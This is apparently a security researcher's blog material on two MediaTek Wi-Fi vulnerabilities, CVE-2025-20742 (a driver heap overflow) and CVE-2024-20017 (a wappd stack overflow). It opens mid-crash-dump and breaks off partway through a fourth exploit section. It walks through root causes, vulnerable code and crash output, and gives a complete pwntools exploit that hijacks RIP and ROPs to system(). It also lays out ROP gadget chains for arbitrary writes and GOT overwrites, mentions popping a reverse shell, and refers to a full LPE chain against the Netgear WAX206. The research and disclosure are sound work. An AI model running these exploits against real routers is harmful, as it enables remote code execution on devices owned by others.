[ 2750.504461] x29: ffffffc01e733850 x28: ffffff80012074d8
[ 2750.509773] x27: ffffff80012d35b0 x26: ffffffc019bf2000
[ 2750.515085] x25: ffffff800ae7ac34 x24: ffffffc01dc38485
[ 2750.520397] x23: 0000000000000000 x22: 0000000000000001
[ 2750.525708] x21: 0000000000000005 x20: ffffffc01e7338b0
[ 2750.531020] x19: 0000000000000000 x18: 0000000000000001
[ 2750.536332] x17: 0000007f8633d340 x16: ffffff800815a0b0
[ 2750.541643] x15: 0000000000000000 x14: 00000064000001f4
[ 2750.546955] x13: 0000131100000000 x12: 0002ffba006e0200
[ 2750.552267] x11: 0000000000000000 x10: 0000040404010001
[ 2750.557578] x9 : 0000000604010100 x8 : ffffff800b370f28
[ 2750.562890] x7 : ffffff800ae75e88 x6 : ffffffc01e733a48
[ 2750.568202] x5 : 0000000000000040 x4 : 0000000000000000
[ 2750.573513] x3 : 1337babe1337babe x2 : ffffffc01e7338b0
[ 2750.578825] x1 : 0000000000000005 x0 : ffffffc0150fb010
[ 2750.584137]

CVE-2025-20742: Heap Overflow in FT_R1khEntryInsert

• Affected Versions: MT7915 v7.4.0.0, MT7629 v6.0.3.0
• Affected Devices: Netgear WAX206, Starlink Wifi Gen2

The vulnerability occurs due to a lack of bounds checking on the attacker-controlled values prior to using one of those values as the size argument to a write operation in FT_R1khEntryInsert(). This function is reached via an ioctl to the RT_PRIV command with subcommand/OID RT_SET_FT_KEY_RSP, and expects the data sent from userspace to be in the format of a struct FT_KDP_EVT_KEY_ELM object. This object includes another embedded object of type FT_KDP_PMK_KEY_INFO, which has members representing the actual key material being transmitted. These members include a statically sized buffer R0KHID[48] and a size value in R0KHIDLen, with the latter defining the actual size of the data in R0KHID[48].

After copying the argument data from userspace into a kernel allocated buffer in RTMPAPSetInformation(), this data is passed to FT_KDP_KeyResponseToUs() for processing/handling. Some initial parsing is done on the data and then it is cast to type FT_KDP_EVT_KEY_ELM and some basic validation is done on some values of the struct. The code continues on to call FT_R1khEntryInsert() and passes in pointers to multiple members of the key element struct sent by the client, including the R0KHID and R0KHIDLen members.

In FT_R1khEntryInsert(), an allocation is made to hold the data for an object of type FT_R1HK_ENTRY (148 bytes) and the values passed in as arguments to the function are used to initialize the new object. The vulnerability occurs when the R0KHID data is copied from the source buffer into a destination buffer using the R0KHIDLen sent in the attacker-controlled key element struct without checking that it does not exceed the size of the destination (49 bytes). The R0KHIDLen field of the FT_KDP_PMK_KEY_INFO is of type unsigned char, meaning that the maximum value it can hold is 255, so this is the max value that can be chosen by an attacker. This results in the ability to overflow the FT_KDP_PMK_KEY_INFO.R0khId[49] buffer by ~200 bytes.

    // @hypr: allocation of vulnerable obj
    if (alloc_mem(p_obj, &entry, sizeof(FT_R1HK_ENTRY)) == NDIS_STATUS_FAILURE) {
		// error case
    }
	...
    if (pR0khId != NULL && R0KHIDLen > 0) {
        entry->R0khIdLen = R0KHIDLen;
		// @hypr: VULNERABLE
        NdisMoveMemory(entry->R0khId, pR0khId, R0KHIDLen);
    }

PoC

PoC Source: PoC Link

The attached PoC can be used to trigger the vulnerability and cause a crash like the one shown in the output below the PoC code. It may require more than a single run to corrupt memory enough to cause a crash but this will usually happen within 3 runs. NOTE: multiple runs will require changing the filler byte argument each run, otherwise the request won’t be seen as a new entry and no action will be taken.

./poc 0x42

It will produce output like this upon crashing:

[ 8566.183685] Unable to handle kernel paging request at virtual address 42424242424242
[ 8566.191426] pgd = ffffffc014989000
[ 8566.194820] [42424242424242] *pgd=0000000000000000, *pud=0000000000000000
[ 8566.201610] Internal error: Oops: 96000004 [#2] PREEMPT SMP
[ 8566.331494] CPU: 1 PID: 0 Comm: swapper/1 Tainted: P      D         4.4.198 #0
[ 8566.338707] Hardware name: MediaTek MT7622 AX3600-gmac1-WAX206 board (DT)
[ 8566.345486] task: ffffffc0030bee00 task.stack: ffffffc003100000
[ 8566.351402] PC is at __kmalloc+0x110/0x1f0
[ 8566.355489] LR is at __kmalloc+0x4c/0x1f0
[ 8566.359490] pc : [<ffffff8008143208>] lr : [<ffffff8008143144>] pstate: 60000145
[ 8566.366875] sp : ffffffc01ffb7b10
[ 8566.370181] x29: ffffffc01ffb7b10 x28: ffffff800a6d4fd0
[ 8566.375493] x27: ffffff800a671000 x26: 0000000080000100
[ 8566.380805] x25: ffffffc01ffb7d80 x24: 0000000000000005
[ 8566.386117] x23: 0000000000127169 x22: ffffff8000a3adc0
[ 8566.391429] x21: 0000000002080020 x20: 4242424242424242

A full LPE exploit using this bug and a couple of others against the WAX206 has been written and will be released along with this post. More details will be given in an upcoming blog post :)

wrapping up

That’s it! But more to come soon, including a deep dive into the full-chain exploit for CVE-2025-20742 and a deep dive into a few bugs not included in this post which impact the WPA EAPOL handlers and which are remotely exploitable! I’m also working on cleaning up some code I wrote earlier this year for a QEMU PCI device to emulate the MT7622 (at least enough to load the driver and interact with the ioctl handlers) which was super useful for debugging and reproducing bugs without the limitations on the test device I had access to. So, stay tuned :)

references

• PoC Code
• MediaTek Security Bulletin - February 2025
• MediaTek Security Bulletin - October 2025
• MediaTek Security Bulletin - November 2025

introduction

Well, here we are. This post was meant to be finished around March of this year to coincide with the publication of the vulnerability I’m going to be writing about, CVE-2024-20017. Unfortunately, this also ended up coinciding with me moving, starting a new job, and getting really busy at said job, so here we are nearly 6 months later. This post is probably going to be one of my longest, so strap in.

At the end of last year I discovered and reported a vulnerability in wappd, a network daemon that is a part of the MediaTek MT7622/MT7915 SDK and RTxxxx SoftAP driver bundle. This chipset is commonly used on embedded platforms that support Wifi6 (802.11ax) including Ubiquiti, Xiaomi, and Netgear devices. As is the case for a handful of other bugs I’ve found, I originally came across this code while looking for bugs on an embedded device: the Netgear WAX206 wireless router. The wappd service is primarily used to configure and coordinate the operations of wireless interfaces and access points using Hotspot 2.0 and related technologies. The structure of the application is a bit complex but it’s essentially composed of this network service, a set of local services which interact with the wireless interfaces on the device, and communication channels between the various components, using Unix domain sockets.

• Affected chipsets: MT6890, MT7915, MT7916, MT7981, MT7986, MT7622
• Affected software: SDK version 7.4.0.1 and before (for MT7915) / SDK version 7.6.7.0 and before (for MT7916, MT7981 and MT7986) / OpenWrt 19.07, 21.02

The vulnerability is a buffer overflow caused by a copy operation that uses a length value taken directly from attacker-controlled packet data without bounds checking. Overall it’s a pretty simple bug to understand as it’s just a run-of-the-mill stack buffer overflow, so I thought I’d use this bug as a case study to explore multiple exploit strategies that can be taken using for this one bug, applying different exploit mitigations and conditions along the way. I think this is interesting as it provides an opportunity to focus on the more creative parts of exploit development: once you know there’s a bug, and you understand the constraints, coming up with all of the different ways you can influence the logic of the application and the effects of the bug to get code execution and pop a shell.

This post will go over 4 exploits for this bug, starting with the simplest version (no stack canaries, no ASLR, corrupted return address) all the way up to an exploit written for the wappd binary shipped on the Netgear WAX206, where multiple mitigations are enabled and we go from x86-64 to arm64. The code for the exploits can be found here; its pretty heavily commented to help make things clearer. It might help to keep those in sight while reading the post so I’ve included links to the relevant exploit at the start of each section.

NOTE: The first 3 exploits discussed below were written for a version of wappd I compiled myself on an x86_64 machine and with some slight modifications (different sets of mitigations, disabling forking behavior, compiler optimization).

background

discovery

This bug was discovered through fuzzing with a network-based fuzzer named fuzzotron that I was trying out for the first time. Check out the Github page for more info but tl;dr it can use radamsa or blab for testcase generation and provides a quick way to fuzz network services with minimal overhead. In the case of this target, I used radamsa for mutations and generated a starting corpus manually using Python to define the structure of the expected packet data and write it to disk. I also made a minor modification to the wapp daemon code so that it saved a copy of the last packet it received to disk as soon as it came in to ensure crashing cases could be saved for triage.

root cause analysis

The vulnerability occurs due to a lack of bounds checking in IAPP_RcvHandlerSSB() prior to using an attacker-controlled value in a call to IAPP_MEM_MOVE() (a wrapper around NdisMoveMemory()) to copy data into a 167-byte stack-allocated structure.

After reading data from either the UDP or TCP socket in IAPP_RcvHandlerUdp() or IAPP_RcvHandlerTcp(), respectively, the raw data is cast to struct IappHdr and the command field is checked; if this is command 50, the IAPP_RcvHandlerSSB() function will be reached and passed a pointer to the raw data received from the socket. Inside IAPP_RcvHandlerSSB(), the data is cast to struct RT_IAPP_SEND_SECURITY_BLOCK * and assigned to the pointer pSendSB; pSendSB->Length is then accessed and used to calculate the length of the data attached to the struct. After copying the payload data from the cast struct pointer to the pCmdBuf pointer that is also passed in as an argument, a call to the macro IAPP_MEM_MOVE() is made (last line in the snippet below) using the value of the attacker-controlled Length field to write from the pSendSB->SB buffer field to the kdp_info struct declared at the start of the function. Prior to this call, the only bounds check done on this value is to check that it does not exceed the maximum packet length of 1600 bytes. As the size of the destination kdp_info struct is only 167 bytes, this results in a stack buffer overflow of up to 1433 bytes of attacker-controlled data.

The vulnerable code snippet from IAPP_RcvHandlerSSB() is shown below:

  pSendSB = (RT_IAPP_SEND_SECURITY_BLOCK *) pPktBuf;

  BufLen = sizeof(OID_REQ);
  pSendSB->Length = NTOH_S(pSendSB->Length);
  BufLen += FT_IP_ADDRESS_SIZE + IAPP_SB_INIT_VEC_SIZE + pSendSB->Length;

  IAPP_CMD_BUF_ALLOCATE(pCmdBuf, pBufMsg, BufLen);
  if (pBufMsg == NULL)
    return;
  /* End of if */

  /* command to notify that a Key Req is received */
  DBGPRINT(RT_DEBUG_TRACE, "iapp> IAPP_RcvHandlerSSB\n");

  OidReq = (POID_REQ) pBufMsg;
  OidReq->OID = (RT_SET_FT_KEY_REQ | OID_GET_SET_TOGGLE);

  /* peer IP address */
  IAPP_MEM_MOVE(OidReq->Buf, &PeerIP, FT_IP_ADDRESS_SIZE);

  /* nonce & security block */
  IAPP_MEM_MOVE(OidReq->Buf+FT_IP_ADDRESS_SIZE,
        pSendSB->InitVec, IAPP_SB_INIT_VEC_SIZE);
  IAPP_MEM_MOVE(OidReq->Buf+FT_IP_ADDRESS_SIZE+IAPP_SB_INIT_VEC_SIZE,
        pSendSB->SB, pSendSB->Length);
  // BUG: overflow occurs here
  IAPP_MEM_MOVE(&kdp_info, pSendSB->SB, pSendSB->Length);

code flow from source to sink

The code flow from input to the vulnerable function is:

• IAPP_Start() starts the main processing loop that calls IAPP_RcvHandler()
• IAPP_RcvHandler() calls select() to find ready socks and calls the appropriate protocol handler function for each sock that is ready
• Assuming the packet is received over UDP, IAPP_RcvHandler() will call IAPP_RcvHandlerUdp(), passing in a pointer pPktBuf to be used to store the data received
• IAPP_RcvHandler() calls recvfrom() to read data from the UDP socket and, assuming the data is successfully read, casts the data to struct IappHdr and checks the command field; if the value is 0x50, IAPP_RcvHandlerSSB() is called to handle the request
• IAPP_RcvHandlerSSB() will then use the raw packet data as described above, using the Length field of the RT_IAPP_SEND_SECURITY_BLOCK struct embedded in the packet in a call to IAPP_MEM_MOVE (wrapper for NdisMoveMemory()), which will write from an offset of the packet data to a stack-allocated struct kdp_info. This is where the overflow occurs.

overview of the injection point

Before going into the details of exploitation lets take a second to review the injection point where the corruption occurs, the expected payload format, and the constraints that exist.

The max size that will be read from the UDP socket by the application is 1600 bytes, so this is the max size of the payload we can send. Accounting for the portions of the payload that must be present to reach the vulnerable code, this gives us about 1430 bytes we can use to corrupt other data. The definition of the RT_IAPP_HEADER and RT_IAPP_SEND_SECURITY_BLOCK structs are shown below. The former is embedded into the latter and this represents the format that requests are expected to arrive in; the application will cast the data read from the socket directly to these types.

/* IAPP header in the frame body, 6B */
typedef struct PACKED _RT_IAPP_HEADER {
  UCHAR Version;  /* indicates the protocol version of the IAPP */
  UCHAR Command;  /* ADD-notify, MOVE-notify, etc. */
  UINT16  Identifier; /* aids in matching requests and responses */
  UINT16  Length;   /* indicates the length of the entire packet */
} RT_IAPP_HEADER;

typedef struct PACKED _RT_IAPP_SEND_SECURITY_BLOCK {
  RT_IAPP_HEADER  IappHeader;
  UCHAR     InitVec[8];
  UINT16      Length;
  UCHAR     SB[0];
} RT_IAPP_SEND_SECURITY_BLOCK;

The main payload section of the RT_IAPP_SEND_SECURITY_BLOCK is in the SB[] field; data is appended directly to the tail of this struct and the size of this payload is meant to be stored in the Length field of the struct. In order to pass other validation checks, the Length field of the IappHeader struct should be kept small; in my payloads I use a size of 0x60. Finally, the RT_IAPP_HEADER.Command field must be set to 50 in order to reach the vulnerable handler IAPP_RcvHandlerSSB.

Other than these basic constraints/requirements, there aren’t any other issues to work around like avoiding null bytes or other restricted values.

exploit 1: RIP hijack via corrupted return address, ROP to system()

• Build: non-forking, no optimizations
• Mitigations: NX

We’ll first start with the simplest path to achieve code execution, assuming no expoit mitigations are in place (except non-executable stack). This means addresses are predictable and no leak is necessary.

This exploit is a classic RIP hijack, using the stack overflow to corrupt the saved return address and redirect execution. This is about as straightforward as it gets: overflow the stack, align the overflow to corrupt the saved return address with the desired address to jump to, and wait for the function to return and use the corrupted value. What you jump to and how you leverage that to get more control is a blank canvas (for the most part). In the case of this exploit, we keep it simple by using the corruption to jump to a ROP gadget that will pop a pointer to a string containing a command to run into the correct registers, and then call system() to have the command executed. As ASLR isn’t enabled, we assume knowledge of the address of system() and a stack address close to where our payload data will be.

#!/usr/bin/env python3
from pwn import *

context.log_level = 'error'

TARGET_IP = "127.0.0.1"
TARGET_PORT = 3517
PAD_BYTE = b"\x22"

# this is addr on the stack close to where our paylaod data is
WRITEABLE_STACK = 0x7fffffff0d70

# Addresses
SYSTEM_ADDR     = 0x7ffff7c50d70
EXIT_ADDR       = 0x7ffff7c455f0
TARGET_RBP_ADDR = 0x5555555555555555  # doesn't matter
GADGET_2        = 0x42bf72  # pop rdi ; pop rbp ; ret

# NOTE: tweak `stack_offset` if env changes and exploit isn't finding command string; +/- 0x10-0x40
# should usually do it.
def create(stack_offset=0x1b0):
    # iapp header
    header = p8(0)      # version
    header += p8(50)    # command
    header += p16(0)    # ident
    header += p16(0x60) # length

    # SSB struct frame
    ssb_pkt = p8(55) * 8     # char buf[8], InitVec
    ssb_pkt += p16(0x150, endian='big')  # u16 Length

    # Main payload
    final_pkt = header + ssb_pkt
    final_pkt += PAD_BYTE * 176
    final_pkt += p64(WRITEABLE_STACK)
    final_pkt += PAD_BYTE * 16
    final_pkt += p64(WRITEABLE_STACK)

    # RBP OVERWRITE
    final_pkt += p64(TARGET_RBP_ADDR)

    # Core Exploit
    # this will be the first place execution will be redirected; will load the next value into $rdi
    final_pkt += p64(GADGET_2)
    # pointer to the command string defined a few lines down
    final_pkt += p64(WRITEABLE_STACK - stack_offset)
    final_pkt += PAD_BYTE * 8
    # address to system to jump to for code exec
    final_pkt += p64(SYSTEM_ADDR)

    # address to exit() cleanly upon return
    final_pkt += p64(EXIT_ADDR)
    # command to run through system()
    final_pkt += b"echo LETSGO!!!\x00"
    return final_pkt

# send payload bytes to target
final_pkt = create()
conn = remote(TARGET_IP, TARGET_PORT, typ='udp')
conn.send(final_pkt)

context.log_level = 'info'
log.info(f"sent payload to target {TARGET_IP}:{TARGET_PORT} ({len(final_pkt)} bytes)")

On a successful run, the output of the iappd daemon will show a failed call to bash and then print out the string “LETSGO!!!”, demonstrating the successful execution of echo, and then exits cleanly.

(Un)fortunately, these days you’re almost guaranteed to find stack cookies and ASLR in use on embedded platforms, which will prevent such trivial exploitation. In those cases, you’ll need an info leak to (hopefully) leak the cookie value or you’ll just have to move onto other techniques that don’t rely on corrupting the saved return address.

exploit 2: arbitrary write via pointer corruption, GOT overwrite

• Build: x86_64, non-forking, no optimizations
• Mitigations: ASLR, stack canaries, NX, partial RELRO
• Exploit code

Continuing from where the previous section left off, let’s say at least stack canaries and ASLR are enabled and the exploit above is no longer viable. Since we don’t have an info leak, let’s shift the focus from corrupting the saved return address on the stack and consider what else could be achieved with the corruption we’re able to cause before reaching the stack canary.

As you may already know, the locally declared variables for a function are stored in the stack frame for that function, immediately ahead of the saved return address and base pointer address. The variables that sit between the end of the overflowed buffer and the start of the previous stack frame will be corrupted by the overflow. Depending on how those values are used in the code that executes after we’ve corrupted memory, it may be possible to abuse the effects of the corruption to accomplish gain further control.

Below are the locally declard variables for the vulnerable function IAPP_RcvHandlerSSB():

  RT_IAPP_SEND_SECURITY_BLOCK *pSendSB;
  UCHAR *pBufMsg;
  UINT32 BufLen, if_idx;
  POID_REQ OidReq;
  FT_KDP_EVT_KEY_ELM kdp_info;

The kdp_info struct is the one that will be overflowed from the effects of the bug, and all of the variables declared before it can be corrupted. Of particular interest in these situations are pointers, which could potentially be abused to get a powerful write primitive – if we alter where a pointer points to, any assignments or writes that the applications performs using that pointer will result in data being written to an arbitrary address of our choice.

In this case, only a few lines of code remain which make use of the variables after the corruption is triggered by the call to IAPP_MEM_MOVE(). These lines are show in the snippet below:

  IAPP_HEX_DUMP("kdp_info.MacAddr", kdp_info.MacAddr, ETH_ALEN);
  if_idx = mt_iapp_find_ifidx_by_sta_mac(&pCtrlBK->SelfFtStaTable, kdp_info.MacAddr);
  if (if_idx < 0) {
    DBGPRINT(RT_DEBUG_TRACE, "iapp> %s: cannot find wifi interface\n", __FUNCTION__);
    return;
  }

  OidReq->Len = BufLen - sizeof(OID_REQ);

  IAPP_MsgProcess(pCtrlBK, IAPP_SET_OID_REQ, pBufMsg, BufLen, if_idx);

The most interesting of these is the assignment to OidReq->Len using the value in BufLen: the former is an access that will dereference a pointer we can corrupt (OidReq), and the latter is an access of an int32 value that we can also control (BufLen). In other words, we control both sides of the assignment expression and can write an arbitrary 4-byte value to an arbitrary address.

So, what can we accomplish with this primitive? There are multiple strategies that might work at this point and this is where the creativity in exploit development comes in. If our ultimate goal is to execute system() to execute shell commands, we’ll generally have to do the following:

1. Get the command string we want executed into memory at a known address
2. Get the pointer to that string placed into the appropriate register to be passed as the first argument to system() (i.e. put into rdi on x86_64)
3. Redirect execution to system()

The exploit linked above applies this concept to corrupt the OidReq pointer and uses the 4-byte write primitive to iteratively write a shell payload into a segment of the GOT (1); as the binary is built with no PIE and only partial RELRO, the GOT is always at a predictable address and writeable, so we can use it as a buffer for our payload. The only constraint on this is that we must avoid overwriting GOT entries for functions that will get called somewhere along the execution path to the vulnerable code, as this would result in a crash before the exploit has finished. The exploit sends multiple corruption payloads to write the shell command, adjusting the corrupted OidReq pointer on each request by +4 bytes to turn the 4-byte write into an arbitrary write-what-where. The exploit then uses the 4-byte write to corrupt the GOT entry of read() with the address of a ROP gadget that kicks off a ROP chain to adjust the stack, pop the address of the shell payload in the GOT into $rdi (2), and then jumps to the call to system() (3) located in IAPP_PID_Kill() to have the shell payload executed. read() was chosen as the GOT entry to corrupt to redirect execution as it’s not in the execution path of the vulnerable code and we can trigger it on-demand by sending a request over TCP since the handler for TCP connections uses read() rather than recvfrom(); all of the earlier payloads are sent over UDP.

One important bit in the way this exploit works is that the redirection of execution happens async from the payload that caused the corruption – it’s only triggered when we send the final TCP request to causes the corrupted GOT entry for read() to be called, which means none of our controlled data is at the top of the stack and none of the data we send in the TCP packet is ever actually read (since read() is gone). This is a problem since we need to have controlled values at the top of the stack after the first ROP gadget returns so that we can retain control of execution. This is where a bit of luck comes in – in this case, we’re able to find some of the payload data from the earlier requests that were sent about 40 bytes below the top of the stack frame (the stack isn’t cleared between functions/uses), so we’re able to reach the payload data by popping 5 values from the stack before doing anything else.

This exploit avoids corrupting the stack metadata at all, so stack canaries don’t come into play. It also only makes use of predictable addresses and ROP to avoid dealing with ASLR, so no leak is needed.

exploit 3: return address corruption + arbitrary write via ROP (full RELRO)

• Build: x86_64, optimization level 2, forking daemon
• Mitigations: ASLR, full RELRO, NX
• Exploit code

So, the last exploit was able to get around the stack canaries and ASLR by using pointer corruption to get an arbitrary write primitive, which was needed to allow us to write controlled values into the GOT so that we would know the address of that data for use later in the exploit. But what if that there wasn’t a pointer nearby for us to corrupt to get that arbitrary write? Well, it turns out that if the application is built with optimization level set to 2 (-O2), various functions along the execution path to the vulnerable code get inlined into one big function running within the scope of IAPP_RcvHandler(), resulting in changes to the stack layout and ordering of variables. This ends up making it impossible to corrupt the OidReq pointer that we previously relied on for the arbitrary write, so another approach must be found.

Since we lost the write primitive we used in the previous exploit, we’ll disable stack canaries on this version to give us a code redirection primitive to start with (we need to have something to start with). This example is meant to demonstrate a way of getting an arbitrary write primitive from a code exec primitive, as it’s not usually enough to be able to just redirect execution, so having both will always make things much easier. To keep things interesting, we’ll enable full RELRO so that the GOT and PLT sections are no longer writeable.

arbitrary write via ROP

The first thing we need to do given the new restrictions is find a way to get an arbitrary write primitive to allow us to write our command payload at a predictable address. Since we can influence the flow of execution, our best bet is going to be to use ROP to get it. As with any exploit that relies on ROP, there’s a certain amount of luck involved in that the binary your exploit is written against needs to contain the required ROP gadgets within the main executable (shared objs will be affected by ASLR).

If we think about how the previous r/w primitive worked, there was a pointer value being dereferenced and a value assigned (i.e. written) to the memory it pointed to. What would this look like in assembly? Probably something like this:

	mov rax, [rsp+0x30];     # read a value from some address into $rax
	mov [rax], rbx;          # write the value of $rbx to the address pointed to by the value in $rax (deref $rax as pointer)

So, if we can find a gadget (or gadgets) that will allow us to do this kind of operation and we can control the values that are used for both sides of the operation, we should be able to get an arbitrary write primitive. And, it turns out, luck is on our side! The gadget below (GADGET_A) is available:

GADGET_A

• 0x405574:
  • mov rdx, QWORD PTR [rsp+0x50];: read a value at $rsp+0x50 (top of stack+80) into $rdx
  • mov QWORD PTR [rdx], rax: dereference $rdx as a pointer and write the value in $rax to that location
  • xor eax, eax;: 0 out lower 32 bits of $rax
  • add rsp; 0x48: shift stack up by 0x48 bytes
  • ret;: return

Great! This gets us most of the way there. But first, we need to find a way to get controlled values into $rax as that will be what gets written to the address in $rdx. To do this, we need to find a gadget that will take a value from the stack and put it into $rax, same as before. This is usually easy enough as pop operations happen all over the place and the odds are at least one of them pops to $rax. This is the gadget I chose to go with for this exploit (GADGET_B):

GADGET_B

• 0x0042acd8: pop rax; add rsp, 0x18; pop rbx; pop rbp; ret;
  • pop rax;: pop the value at the top of the stack into $rax
  • add rsp, 0x18;: increment $rsp by 0x18 (24) bytes; will need +24 bytes of padding to account for this operation
  • pop rbx; pop rbp;: pop the next two values from the (new) top of the stack into $rbx and $rbp, respectively; will need +16 bytes of padding to account for this operation
  • ret;: return

Chaining the second gadget with the first one gets us everything we need! We can now write an arbitrary 8-byte value to an arbitrary address, assuming we control the values at the top of the stack when execution is redirected (which we will since we corrupt the saved return address, which is at the top of the stack). Here’s what the payload for this chain would look like, including the padding needed to account for the instructions that modify the stack pointer.

GADGET_B
value_to_write ; popped into rax
padding[40]    ; account for 2 pops and a +0x18 shift to rsp
GADGET_A       ; value jumped to after ret from GADGET_B; read $rsp+50 into rdx
padding[72]    ; account for rsp+0x48
<next_jump_addr> ; addr jumped to after ret from GADGET_A
addr_to_write_to ; value read into $rdx in the start of GADGET_A

Similar to the previous exploit, this ROP chain can be inserted multiple times to write more than 8 bytes starting at a target address, but in order to do this, there’s one more gadget that is needed to deal with a minor nuance in how GADGET_A interacts with the stack.

The first gadget we discuss above (GADGET_A) pops the value at $rsp+0x50 into $rdx, so our payload needs to place the address we want to write to at a +0x50 byte offset from where this gadget is in the payload. It then shifts the stack up by +0x48, leaving the stack pointer pointing to the value right before the value we use as the write destination. This means the address of the next gadget needs to be placed at +0x48 so that it will be used when ret is reached; if we want to perform another write, this would be the address for GADGET_B, and this is where the issue comes up. After jumping to GADGET_B, it will pop the next value from the top of the stack ([$rsp]) into $rax, but since GADGET_A shifted the stack pointer by +0x48, when the ret is reached in GADGET_A the value of $rsp is incremented by 8 and left pointing to offset +0x50 (the value we pass as the write destination), and this is the value that GADGET_B would end up popping into $rax. That’s not what we want, but thankfully there’s a simple way to solve this problem: instead of jumping directly to GADGET_B at the end of the first chain, we jump to another gadget that will pop a single value from the stack (thereby incrementing $rsp to +0x58) and we’ll place the address to GADGET_B there so that we jump to it when this gadget returns.

So, taking that into account, this is how the GADGET_B+GADGET_A sub-chain(?) would be chained multiple times:

>GADGET_B
value_to_write     ; popped into rax
padding[40]        ; account for 2 pops and a +0x18 shift to rsp
>GADGET_A          ; value jumped to after ret from GADGET_B; read $rsp+50 into rdx
padding[72]        ; account for rsp+0x48
>POP_RET_GADGET    ; addr jumped to after ret from GADGET_A; pop-ret so GADGET_B 8 bytes up is next ret address and not addr_to_write_to
addr_to_write_to   ; value read into $rdx in the start of GADGET_A;
--
>GADGET_B
value_to_write     ; popped into rax
padding[40]        ; account for 2 pops and a +0x18 shift to rsp
>GADGET_A          ; value jumped to after ret from GADGET_B; read $rsp+50 into rdx
padding[72]        ; account for rsp+0x48
>POP_RET_GADGET    ; addr jumped to after ret from GADGET_A; pop-ret so GADGET_B 8 bytes up is next ret address and not addr_to_write_to
addr_to_write_to   ; value read into $rdx in the start of GADGET_A
--
...
--
>GADGET_B
value_to_write
padding[40]
>GADGET_A
padding[72]
>FINAL_JUMP_DEST   ; addr jumped to after arbitrary write is done
addr_to_write_to

If this last part was hard to follow, don’t worry about it (it was also hard to write). The important part is that rather than jumping directly back to GADGET_B when linking multiple instances of the chain, we instead jump to a gadget that will pop a value from the stack and then return to jump to GADGET_B . This is done to ensure the values in the payload are properly adjusted between iterations through the chain.

dealing with full RELRO

Having acquired the write primitive we needed, we can use the same strategy as the previous exploit to write our shell payload at a predictable address, with a slight modification. As we can no longer write into the GOT or PLT segments due to full RELRO, we instead write the shell command passed to system() in the only remaining writeable segments that have static/predictable addresses (assuming no PIE) – the .bss and .data segments. Once that’s done, the exploit jumps to a final ROP chain that places the address where we wrote the command into $rdi and jumps to system() via the GOT symbol so we don’t need to leak the libc address.

We get command execution and use it to pop a reverse shell.

exploit 4: WAX206 return address corruption + arbitrary r/w via pointer corruption

• Build: aarch64, build shipped with Netgear WAX206
• Mitigations: full RELRO, ASLR, NX, stack canaries*
• Exploit code

We’ve made it to the final exploit! For this one we’re going to switch things up a bit and move on to a real-world target: the version of wappd shipped on the Netgear WAX206. This version is compiled for aarch64 and has ASLR, NX, full RELRO, and stack cookies enabled. I think it offers some valuable insight into the differences between writing exploits in controlled environments vs. writing them against real-world targets – things often change in important ways that force you to adapt.

the story

I’m going to switch up the writing style for this section and use more of a narrative format so that I can provide some context by walking through the process of how I figured everything out. This exploit was a bit of a challenge to figure out and I think the process is best told as a story. After that we’ll switch back to the style used in the preceding sections.

DISCLAIMER: This is the first time I’ve written this kind of exploit for an arm64 target and I had to learn a lot of the stuff mentioned below along the way. For this reason, you should take the details with a grain of salt as they’re my current understanding of how/why things worked a certain way but they might not be 100% accurate. If you notice anything that’s incorrect please let me know!

important changes

I’ll start this section by going over some of the important differences for this target and the previous ones, and how that ultimately impacted the final exploit.

The first major change was a difference in the optimization and inlining of code in the binary. Whether it was the result if different compiler versions, architectural differences, or something else, I’m ultimately not sure. But the outcome was that the layout of stack variables changed and the ability to corrupt the OidReq pointer that was previously targeted was no longer viable, similar to exploit 3. So, this meant there was no arbitrary write primitive to start with. What about a code redirection primitive (which the previous exploit relied on to get the write primitive)?

This is where the next important difference comes in: arm64’s way of handling function returns. In arm64, the return address is usually expected to be in the x30 register and it will only be pushed onto the stack for nested function calls that will need to overwrite it. I learned this the hard way when I attached to the process with GDB and could see my target jump address correctly placed on the stack to be used on the next return…and then saw it go completely ignored when the function hit the final ret and used the value in x30 without touching the stack. The inlining mentioned above resulted in various function calls along the path of the vulnerable code getting inlined into one massive function, eliminating basically every opportunity to corrupt a return address on the stack which would be used in a ret (inlined functions don’t ret). To top it all off, the only stack frame that did have a saved return address that could be corrupted and that would actually be used was for the main request processing loop – which runs infinitely and won’t return unless a SIGTERM signal is caught (we’ll come back to this shortly). There is a ton of nuance for each of these changes and their effect on the final exploit, but tl;dr, this meant needing to go back to the drawing board to come up with a new exploit strategy.

The one piece of good news was that even though checksec reports that the binary has stack canaries enabled, analyzing it in Binja showed that the cookie-checking logic inserted by the compiler was only present in two functions, and those were from an external library. This meant that I wouldn’t actually have to worry about stack cookies at all! Too bad corrupting saved return addresses seems to be out of the question given the conditions described in the previous paragraph…

arbitrary write via pPktBuf pointer corruption

Based on the way I’d approached the previous exploits, I figured there had to be a way to corrupt a pointer somewhere so that’s what I tackled first. After spending a bit of time doing some debugging live on the WAX206 and testing different payloads, I eventually found that I could overwrite three of the pointers defined in IAPP_RcvHandler(): pPktBuf, pCmdBuf, and pRspBuf. The first of these, pPktBuf, points to the buffer that is used to store the inbound request data read from the network – corrupting this pointer allows us to point it to an arbitrary location and then have the entire contents of a subsequent request (up to 1600 bytes) written to that location. Great!

Interestingly, it was the effects of the inlining and arm64 semantics mentioned above that made it possible to reach these pointers at all – under normal circumstances, writing far enough to reach them would result in corrupting the stack frames for both IAPP_RcvHandlerSSB() and IAPP_RcvHandlerUdp(), and cause a premature crash before the corrupted pointers could be used again. In this case, IAPP_RcvHandlerUdp() is inlined directly into IAPP_RcvHandler() (so no return address is used) and IAPP_RcvHandlerSSB() is able to get through it’s execution without having to push/pop it’s return address value onto the stack where it could be corrupted.

So, I now had a write primitive of up to 1600 bytes to a controllable location. That should be enough to get over the finish line, right?

when arbitrary write isn’t enough

What exploit strategies are viable to achieve code execution when starting with only an arbitrary write? Taking into account the mitigations present (namely ASLR) and assuming no leak is available, there’s really only one option in this case: corrupt some data located at a predictable/known address which will either result in code execution directly (e.g. overwriting a function pointer) or create conditions that will result in additional corruption that can be leveraged to take control of execution. So, here we return to the concept discussed in exploit 2: finding corruptable data that will be used by the application in a way that can be exploited.

